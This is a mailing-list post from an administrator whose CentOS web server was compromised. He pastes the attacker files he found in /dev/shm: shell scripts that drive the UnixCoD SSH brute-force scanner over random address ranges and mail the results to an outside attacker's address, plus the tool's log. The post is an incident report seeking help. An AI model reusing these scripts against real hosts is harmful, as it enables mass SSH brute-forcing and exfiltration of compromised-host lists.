[CentOS] Centos 5.3 -> Apache - Under Attack ? Oh hell....
Linux Advocate
linuxhousedn at yahoo.com
Wed Jun 3 16:33:26 UTC 2009
BRUCE U ARE A F******* GENIUS MAN !!!!!
u were right bro....thanx for spending the time on this man....
more info below !!!!!!!!!!!!!
----- Original Message ----
> From: bruce <bedouglas at earthlink.net>
> To: linuxhousedn at yahoo.com
> Sent: Wednesday, June 3, 2009 9:53:24 PM
> Subject: RE: [CentOS] Centos 5.3 -> Apache - Under Attack ? Oh hell....
>
> hi...
>
> i've seen a few of your threads on your issue of the 'atack' processes
> running from your web server...
>
> i'm replying to you offline, as ......
>
>
> take a look over your box, and let's see what you have...
>
as per yr tip i had found a file called atack under this folder /dev/shm/unix .... even though i could not locate such a file before.....
i have now removed that file and am now probing the contents of the /dev/shm/unix folder.....
[root at fwgw unix]# pwd
/dev/shm/unix
[root at fwgw unix]# ls -al
total 4352
drwxr-xr-x 2 apache apache 360 Jun 3 23:47 .
drwxrwxrwt 3 root root 60 Jun 3 00:24 ..
-rwxr-xr-x 1 apache apache 0 May 19 06:02 124.164.find.22
-rwxr-xr-x 1 apache apache 0 Mar 24 22:28 129.135.find.22
-rwxr-xr-x 1 apache apache 0 Mar 24 22:25 129.find.22
-rwxr-xr-x 1 apache apache 0 May 25 13:54 21.168.find.22
-rwxr-xr-x 1 apache apache 12687 May 25 06:16 60.191.find.22
-rw-r--r-- 1 apache apache 0 Jun 3 23:45 83.182.find.22
-rwxr-xr-x 1 apache apache 4631 Apr 21 17:50 84.2.find.22
-rwxr-xr-x 1 apache apache 0 May 25 06:17 89.38.find.22
-rwxr-xr-x 1 apache apache 2362 May 19 15:28 91.204.find.22
-rwxr-xr-x 1 apache apache 216 May 18 2005 auto
-rwxr-xr-x 1 apache apache 4374933 May 15 19:41 data.conf
-rwxr-xr-x 1 apache apache 15729 Oct 14 2005 find
-rw-r--r-- 1 apache apache 5262 Jun 3 23:45 log
-rwxr-xr-x 1 apache apache 751 May 25 06:33 unix
-rw-r--r-- 1 apache apache 0 Jun 3 23:04 vuln.txt
-rwxr-xr-x 1 apache apache 671 May 25 13:56 x
The contents of file 'x' are;
#!/bin/bash
echo "[+] PLM prea destept pentru voi : Yuli [+]"
X=0
c=0
while [ $X -le 255 ]
do
c=$RANDOM
let "c %= 255"
echo "[+] Scanam radom class b $1.$c [+]"
./find $1.$c 22
sleep 10
cat $1.$c.find.22 |sort |uniq > ip.conf
oopsnr2=`grep -c . ip.conf`
echo "[+] Incepe partea cea mai misto :D"
echo "[+] Doar $oopsnr2 de servere. Exista un inceput pt. toate !"
echo "[=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=]"
echo "[+] Incepem sa vedem cate server putem sparge"
./atack 100 >> log
mail -s $1.$c yuli1989xxx at yahoo.com < log
rm -rf $1.$c.find.22 ip.conf
echo "[+] Scanner a terminat de scanat !"
echo "[+] Next random class b !"
X=$((X+1))
the contents of the file 'unix' are;
#!/bin/bash
if [ $# != 1 ]; then
echo "[+] Folosim : $0 [b class]"
exit;
fi
echo "[+][+][+][+][+] UnixCoD Atack Scanner [+][+][+][+][+]"
echo "[+] SSH Brute force scanner : user & password [+]"
echo "[+] Undernet Channel : #yuli [+]"
echo "[+][+][+][+][+][+][+] ver 0x10 [+][+][+][+][+][+][+]"
./find $1 22
sleep 10
cat $1.find.22 |sort |uniq > ip.conf
oopsnr2=`grep -c . ip.conf`
echo "[+] Incepe partea cea mai misto :D"
echo "[+] Doar $oopsnr2 de servere. Exista un inceput pt. toate !"
echo "[=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=]"
echo "[+] Incepem sa vedem cate server putem sparge"
./atack 100
rm -rf $1.find.22 ip.conf
echo "[+] UnixCoD Scanner a terminat de scanat !"
the contents of 'auto' are;
#!/bin/sh
echo
echo "Enter A class range"
read brange
echo "Enter output file"
read file
crange=0
while [ $crange -lt 255 ] ; do
echo -n "./assh $brange.$crange ; " >> $file
let crange=crange+1
done
the contents of 'log' are;
[+] No SSH ->www:www:83.246.113.34
[+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ]
[+] No SSH ->www:www:83.246.119.41
[+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ]
[+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ]
Further googling indicates that UnixCod is a brute force ssh scanner... what is is odd is that i have fail2ban ruunning ( which blocks IPs after 2 failed attempts) and a 8 letter passwd but i still got hacked....
Guys...any comments....
AND ONCE AGAIN THANKS BRUCE !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
Regards,
Marco.
More information about the CentOS
mailing list